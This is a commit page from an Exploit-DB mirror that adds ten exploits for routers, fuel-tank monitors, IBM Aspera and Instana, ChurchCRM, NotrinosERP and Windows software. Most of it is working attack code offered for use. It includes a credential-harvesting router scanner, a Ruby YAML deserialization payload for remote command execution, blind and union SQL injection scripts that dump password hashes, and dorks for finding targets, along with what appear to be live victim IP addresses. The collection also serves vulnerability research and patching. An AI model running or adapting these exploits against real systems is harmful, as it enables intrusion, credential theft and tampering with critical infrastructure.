bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-08

Browse source 
11 changes to exploits/shellcodes/ghdb

Snitz Forum v1.0 - Blind SQL Injection

Franklin Fueling Systems  TS-550 - Exploit and Default Password

Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing

MAC 1200R - Directory Traversal

Docker based datastores for IBM Instana 241-2 243-0 - No Authentication

IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)

ChurchCRM 4.5.1 - Authenticated SQL Injection

NotrinosERP 0.7 - Authenticated Blind SQL Injection

Rukovoditel 3.3.1 - Remote Code Execution (RCE)

Wondershare Dr Fone 12.9.6 - Privilege Escalation
This commit is contained in:
Exploit-DB 2023-04-08 00:16:27 +00:00
parent d7c9ba572a
commit 99cef8d064
11 changed files with 672 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/asp/webapps/51323.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Snitz Forum v1.0 - Blind SQL Injection
# Date: 13/03/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://forum.snitz.com/
# Software Link: https://sourceforge.net/projects/sf2k/files/
# Version: ALL VERSION
# Tested on: Windows 10
[code]
._ _______.
*/ ///______I
) . /_(_)
/__/ *0day PoC*
http://www.site.com/forum/cal.asp?date=25/03/2023 <= SQLi ???
http://www.site.com/forum/log.asp?log_id=3456 <= Blind SQLi #!WORK!#
._________.
*/ ///______I
) . /_(_)
/__/*0day PoC End*
[/code]

108
exploits/hardware/remote/51317.py Executable file
View file

@ -0,0 +1,108 @@
#!/usr/bin/python3
# Exploit Title: Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing
# Shodan Dork: http.favicon.hash:-2145085239 http.title:"Tenda | LOGIN"
# Date: 09/03/2023
# Exploit Author: @h454nsec
# Github: https://github.com/H454NSec/CVE-2020-35391
# Vendor Homepage: https://www.tendacn.com/default.html
# Product Link: https://www.tendacn.com/product/f3.html
# Version: All
# Tested on: F3v3.0 Firmware (confirmed)
# CVE : CVE-2020-35391
import re
import os
import sys
import argparse
import base64
import requests
import subprocess
try:
import mmh3
import codecs
except ImportError:
print("[!] Install mmh3: pip3 install mmh3")
sys.exit()
Color_Off="\033[0m"
Black="\033[0;30m" # Black
Red="\033[0;31m" # Red
Green="\033[0;32m" # Green
Yellow="\033[0;33m" # Yellow
Blue="\033[0;34m" # Blue
Purple="\033[0;35m" # Purple
Cyan="\033[0;36m" # Cyan
White="\033[0;37m" # White
def ip_checker(ip):
if "/" in ip:
splited = ip.split("/")
if "http://" in ip or "https://" in ip:
return f"{splited[0]}://{splited[2]}"
else:
return f"http://{splited[0]}"
else:
return f"http://{ip}"
def is_tenda(ip):
try:
response = requests.get(f'{ip}/favicon.ico')
favicon = codecs.encode(response.content, "base64")
favicon_hash = mmh3.hash(favicon)
if favicon_hash == -2145085239:
return True
return False
except Exception as error:
return False
def password_decoder(data):
try:
for nosense_data in data.split("\n"):
if ("http_passwd=" in nosense_data):
encoded_password = nosense_data.split("=")[-1]
break
password_bytes = base64.b64decode(encoded_password)
password = password_bytes.decode("utf-8")
if (len(password) != 0):
return password
return False
except Exception as error:
return False
def main(db):
for ip in db:
ip_address = ip_checker(ip)
tenda = is_tenda(ip_address)
header = print(f"{Green}[+]{Yellow} {ip_address}{Color_Off}", end="") if tenda else print(f"{Red}[-]{Yellow} {ip_address}{Color_Off}", end="")
try:
output = subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg -A '' -H 'Accept:' -H 'Host:' -s", shell=True)
data = output.decode('utf-8')
password = password_decoder(data)
if password:
if not os.path.isdir("config_dump"):
os.mkdir("config_dump")
with open(f"config_dump/{ip_address.split('/')[-1]}.cfg", "w") as o:
o.write(data)
with open(f"credential.txt", "a") as o:
o.write(f"{ip_address}|{password}\n")
print(f"{Purple}:{Cyan}{password}{Color_Off}")
else:
print()
except Exception as error:
print()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--ip', default='192.168.0.1', help='IP address of the target router (Default: http://192.168.0.1)')
parser.add_argument('-l', '--list_of_ip', help='List of IP address')
args = parser.parse_args()
db = []
ip_list = args.list_of_ip
if ip_list:
with open(ip_list, "r") as fr:
for data in fr.readlines():
db.append(data.strip())
else:
db.append(args.ip)
main(db)

60
exploits/hardware/remote/51321.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Franklin Fueling Systems TS-550 - Exploit and Default Password
# Date: 3/11/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
# Version: TS-550
# Tested on: Linux/Android(termux)
Step 1 : attacker can using these dorks and access to find the panel
inurl:"relay_status.html"
inurl:"fms_compliance.html"
inurl:"fms_alarms.html"
inurl:"system_status.html"
inurl:"system_reports.html'
inurl:"tank_status.html"
inurl:"sensor_status.html"
inurl:"tank_control.html"
inurl:"fms_reports.html"
inurl:"correction_table.html"
Step 2 : attacker can send request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
Step 3 : if get response that show like this
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
Step 4 : attacker can crack the hashesh using john the ripper
notice : most of the panels password is : admin
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

16
exploits/hardware/webapps/51315.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: MAC 1200R - Directory Traversal
# Google Dork: "MAC1200R" && port="8888"
# Date: 2023/03/09
# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
# Vendor Homepage: https://www.mercurycom.com.cn/
# Software Link: https://www.mercurycom.com.cn/product-1-1.html
# Version: all versions. (REQUIRED)
# Tested on: all versions.
# CVE : CVE-2021-27825
1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888".
2. Open the affected website like "http://IP:8888/web-static/".
3. For example:
1http://60.251.151.2:8888/web-static/
2http://222.215.15.70:8888/web-static/

87
exploits/multiple/remote/51314.py Executable file
View file

@ -0,0 +1,87 @@
# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect
# Define the available options and their corresponding commands
COMMANDS = {
"kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
"cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
"clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
"cockroach": "cockroach sql --host {host}:{port} --insecure",
"zookeeper": "echo dump |ncat {host} {port}",
"node-export": "curl http://{host}:{port}",
"elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
"prometheus": "curl http://{host}:{port}/metrics",
"clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}
# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")
# Parse the command-line arguments
args = parser.parse_args()
# Determine the port number to use
if args.port is None:
if args.option == "cassandra":
port = "9042"
elif args.option == "clickhouse":
port = "8123"
elif args.option == "cockroach":
port = "26257"
elif args.option == "elasticsearch":
port = "9200"
elif args.option == "kafka":
port = "9092"
elif args.option == "node-export":
port = "8181"
elif args.option == "prometheus":
port = "9090"
elif args.option == "zookeeper":
port = "2181"
else:
port = str(args.port)
# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)
# Print the command line if verbose option is provided
if args.verbose:
print(f"Executing command: {command}")
# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
child = pexpect.spawn(command)
child.expect("Connected to.*", timeout=10)
child.interact()
output = child.before
elif args.option == "cockroach":
child = pexpect.spawn(command)
child.expect("root@.*:", timeout=10)
child.interact()
output = child.before
# If any other option is selected, execute the command and capture the output
else:
output = subprocess.check_output(command, shell=True)
# If an output file is provided, write the output to the file
if args.output:
with open(args.output, "wb") as f:
f.write(output)
# Print the output to the console
print(output.decode())

110
exploits/multiple/remote/51316.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
# Date: 02/02/2023
# Exploit Author: Maurice Lambert <mauricelambert434@gmail.com>
# Vendor Homepage: https://www.ibm.com/
# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex
# Version: 4.4.1
# Tested on: Linux
# CVE : CVE-2022-47986
"""
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""
__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/CVE-2022-47986"
copyright = """
CVE-2022-47986 Copyright (C) 2023 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright
__all__ = []
print(copyright)
from urllib.request import urlopen, Request
from sys import argv, exit, stderr, stdout
from shutil import copyfileobj
from json import dumps
def main() -> int:
if len(argv) != 3:
print("USAGES:", argv[0], "[hostname] [command]", file=stderr)
return 1
copyfileobj(
urlopen(
Request(
argv[1] + "/aspera/faspex/package_relay/relay_package",
method="POST",
data=dumps({
"package_file_list": [
"/"
],
"external_emails": f"""
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "pew"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:PrettyPrint
output: !ruby/object:Net::WriteAdapter
socket: &1 !ruby/module "Kernel"
method_id: :eval
newline: "throw `{argv[2]}`"
buffer: {{}}
group_stack:
- !ruby/object:PrettyPrint::Group
break: true
method_id: :breakable
""",
"package_name": "assetnote_pack",
"package_note": "hello from assetnote team",
"original_sender_name": "assetnote",
"package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
"metadata_human_readable": "Yes",
"forward": "pew",
"metadata_json": '{}',
"delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
"delivery_sender_name": "assetnote",
"delivery_title": "TEST",
"delivery_note": "TEST",
"delete_after_download": True,
"delete_after_download_condition": "IDK",
}).encode()
)
),
stdout.buffer,
)
return 0
if __name__ == "__main__":
exit(main())

88
exploits/php/webapps/51318.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection
# Date: 11-03-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md
# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7
# Vendor Homepage: https://notrinos.com/
# Version: 0.7
# Tested on: Windows, Linux
# CVE: CVE-2023-24788
"""
The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber.
This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.
The OrderNumber parameter require a valid orderNumber value.
This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application.
"""
import sys, requests
def injection(target, inj_str, session_cookies):
for j in range(32, 126):
url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))
headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}
r = requests.get(url, headers=headers)
res = r.text
if "NotrinosERP 0.7 - Login" in res:
session_cookies = login(target, username, password)
headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}
r = requests.get(url, headers=headers)
elif (r.elapsed.total_seconds () > 2 ):
return j
return None
def login(target, username, password):
target = "%s/index.php" % (target)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)
s = requests.session()
r = s.post(target, data = data, headers = headers)
return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')
def retrieveDBName(session_cookies):
db_name = ""
print("(+) Retrieving database name")
for i in range (1,100):
injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
retrieved_value = injection(target, injection_str, session_cookies)
if (retrieved_value):
db_name += chr(retrieved_value)
else:
break
print("Database Name: "+db_name)
def retrieveDBVersion(session_cookies):
db_version = ""
print("(+) Retrieving database version")
for i in range (1,100):
injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
retrieved_value = injection(target, injection_str, session_cookies)
if (retrieved_value):
db_version += chr(retrieved_value)
sys.stdout.flush()
else:
break
print("Database Version: "+db_version)
def main():
print("(!) Login to the target application")
session_cookies = login(target, username, password)
print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")
retrieveDBName(session_cookies)
print("")
retrieveDBVersion(session_cookies)
if __name__ == "__main__":
if len(sys.argv) != 4:
print("(!) Usage: python3 exploit.py <URL> <username> <password>")
print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")
sys.exit(-1)
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
main()

61
exploits/php/webapps/51319.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection
# Date: 11-03-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.1
# Tested on: Windows, Linux
# CVE: CVE-2023-24787
"""
The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.
This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School.
The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.
This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.
This script is created as Proof of Concept to retrieve the username and password hash from user_usr table.
"""
import sys, requests
def dumpUserTable(target, session_cookies):
print("(+) Retrieving username and password")
print("")
url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)
headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}
r = requests.get(url, headers=headers)
lines = r.text.splitlines()
for line in lines:
if "<td >Perseverance" in line:
print(line.split("Perseverance")[1].split("</td>")[0])
def login(target, username, password):
target = "%s/session/begin" % (target)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = "User=%s&Password=%s" % (username, password)
s = requests.session()
r = s.post(target, data = data, headers = headers)
return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')
def main():
print("(!) Login to the target application")
session_cookies = login(target, username, password)
print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")
dumpUserTable(target, session_cookies)
if __name__ == "__main__":
if len(sys.argv) != 4:
print("(!) Usage: python3 exploit.py <URL> <username> <password>")
print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")
sys.exit(-1)
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
main()

57
exploits/php/webapps/51322.txt Normal file
View file

File diff suppressed because one or more lines are too long

51
exploits/windows/local/51324.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation
# Date: 14 March 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://drfone.wondershare.com
# Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I
# Version: Dr Fone version 12.9.6
# Tested on: Window 10 (10.0.19045.2604)
# CVE : CVE-2023-27010
*Vulnerability description*:
Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on
Windows have weak service permissions and are susceptible to local
privilege escalation vulnerability. Weak service permissions run with
system user permission, allowing a standard user/domain user to elevate to
administrator privilege upon successfully modifying the service or
replacing the affected executable. DriverInstall.exe gave modification
permission to any authenticated users in the windows operating system,
allowing standard users to modify the service and leading to Privilege
Escalation.
C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe
Everyone:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst
SERVICE_NAME: WsDrvInst
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem

10
files_exploits.csv
View file

@ -1583,6 +1583,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16962,exploits/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",webapps,asp,,2011-03-11,2011-03-11,1,,,,,,
34614,exploits/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",webapps,asp,,2010-09-09,2014-09-11,1,,,,,,https://www.securityfocus.com/bid/43110/info
26439,exploits/asp/webapps/26439.txt,"Snitz Forum 2000 - 'post.asp' Cross-Site Scripting",2005-10-31,h4xorcrew,webapps,asp,,2005-10-31,2013-06-25,1,CVE-2005-3411;OSVDB-20421,,,,,https://www.securityfocus.com/bid/15241/info
51323,exploits/asp/webapps/51323.txt,"Snitz Forum v1.0 - Blind SQL Injection",2023-04-07,"Emiliano Febbi",webapps,asp,,2023-04-07,2023-04-07,0,,,,,,
4687,exploits/asp/webapps/4687.html,"Snitz Forums 2000 - 'Active.asp' SQL Injection",2007-12-03,BugReport.IR,webapps,asp,,2007-12-02,,1,OSVDB-39002;CVE-2007-6240,,,,,
24604,exploits/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",webapps,asp,,2004-09-16,2013-03-06,1,CVE-2004-1687;OSVDB-10070,,,,,https://www.securityfocus.com/bid/11201/info
28566,exploits/asp/webapps/28566.txt,"Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting",2006-09-13,ajann,webapps,asp,,2006-09-13,2013-09-27,1,CVE-2006-4796;OSVDB-28832,,,,,https://www.securityfocus.com/bid/20004/info
@ -3584,6 +3585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38356,exploits/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",remote,hardware,,2013-03-01,2015-09-30,1,CVE-2013-2560;OSVDB-90821,,,,,https://www.securityfocus.com/bid/58290/info
38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info
39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info
51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,,
49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,,
32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,,
4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,,
@ -3893,6 +3895,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,,2018-03-06,2018-03-06,0,CVE-2018-5767,,,http://www.exploit-db.com/screenshots/idlt44500/rootshell.png,,https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,,2021-04-21,2021-04-21,0,,,,,,
50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",2022-05-11,LiquidWorm,remote,hardware,,2022-05-11,2022-05-11,0,,,,,,
51317,exploits/hardware/remote/51317.py,"Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing",2023-04-07,@h454nsec,remote,hardware,,2023-04-07,2023-04-07,0,CVE-2020-35391,,,,,
5150,exploits/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,remote,hardware,,2008-02-17,,1,OSVDB-42179;CVE-2008-0804,,,,,
38242,exploits/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",remote,hardware,,2015-09-20,2015-09-20,0,OSVDB-127948;OSVDB-127871,,,,,
38850,exploits/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",remote,hardware,,2013-11-22,2015-12-02,1,CVE-2013-5912;OSVDB-100273,,,,,https://www.securityfocus.com/bid/63880/info
@ -4491,6 +4494,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17116,exploits/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware,,2011-04-04,2011-04-04,0,,,,,,
44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,,2018-04-18,2018-04-18,0,CVE-2018-8880,,,,,
45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,,2018-09-10,2018-09-10,0,,,,,,
51315,exploits/hardware/webapps/51315.txt,"MAC 1200R - Directory Traversal",2023-04-07,"Chunlei Shang_ Jiangsu Public Information Co._ Ltd.",webapps,hardware,,2023-04-07,2023-04-07,0,CVE-2021-27825,,,,,
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,,2020-12-14,2020-12-14,0,,,,,,
35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware,,2015-01-29,2015-01-29,0,CVE-2012-4891;CVE-2012-4889;OSVDB-80874;OSVDB-117694;OSVDB-117566,,,,,
25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware,,2013-05-29,2013-05-29,1,CVE-2013-1605;CVE-2013-1604;OSVDB-93709;OSVDB-93708,,,,,http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
@ -10685,6 +10689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28987,exploits/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,remote,multiple,,2006-11-13,2013-10-16,1,,,,,,https://www.securityfocus.com/bid/21040/info
31890,exploits/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",remote,multiple,,2008-06-20,2014-02-25,1,CVE-2008-7184;OSVDB-57877,,,,,https://www.securityfocus.com/bid/29611/info
9915,exploits/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",remote,multiple,3632,2002-01-31,2017-04-01,1,CVE-2004-2687;OSVDB-13378,"Metasploit Framework (MSF)",,,,
51314,exploits/multiple/remote/51314.py,"Docker based datastores for IBM Instana 241-2 243-0 - No Authentication",2023-04-07,"Shahid Parvez (zippon)",remote,multiple,,2023-04-07,2023-04-07,0,CVE-2023-27290,,,,,
34297,exploits/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,remote,multiple,,2010-07-09,2014-08-09,1,,,,,,https://www.securityfocus.com/bid/41560/info
5257,exploits/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,remote,multiple,,2008-03-13,,1,CVE-2008-1218,,,,,
30643,exploits/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",remote,multiple,,2007-10-05,2014-01-03,1,CVE-2007-5264;OSVDB-41642,,,,,https://www.securityfocus.com/bid/25943/info
@ -10810,6 +10815,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
26966,exploits/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",remote,multiple,,2005-12-22,2013-07-21,1,CVE-2005-4502;OSVDB-21916,,,,,https://www.securityfocus.com/bid/16031/info
19466,exploits/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",remote,multiple,,1999-08-18,2017-11-15,1,CVE-1999-0753;OSVDB-1049,,,,,https://www.securityfocus.com/bid/591/info
19459,exploits/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Remote Buffer Overflow",1999-08-13,"jduck & stranjer",remote,multiple,,1999-08-13,2012-06-30,1,CVE-1999-0679;OSVDB-1043,,,,,https://www.securityfocus.com/bid/581/info
51316,exploits/multiple/remote/51316.py,"IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)",2023-04-07,"Maurice Lambert",remote,multiple,,2023-04-07,2023-04-07,0,CVE-2022-47986,,,,,
